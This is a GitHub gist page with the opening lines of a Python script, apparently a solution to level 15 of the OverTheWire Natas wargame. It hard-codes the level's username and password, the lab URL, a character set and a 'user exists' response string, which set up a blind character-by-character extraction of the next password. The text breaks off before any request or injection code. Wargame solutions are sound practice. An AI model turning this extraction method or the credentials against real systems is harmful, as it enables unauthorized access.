Skip to content

Instantly share code, notes, and snippets.

View Manoj-nathwani's full-sized avatar

Manoj Nathwani Manoj-nathwani

View GitHub Profile
@Manoj-nathwani
Manoj-nathwani / Natas15.py
Created March 17, 2016 20:19
Natas15 using Python 3
# coding=utf-8
import requests, base64, ipdb
from bs4 import BeautifulSoup
username = 'natas15:'.encode()
password = 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'.encode()
url = 'http://natas15.natas.labs.overthewire.org'
chars = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
existsStr = 'This user exists.'.encode()
parsedChars = ''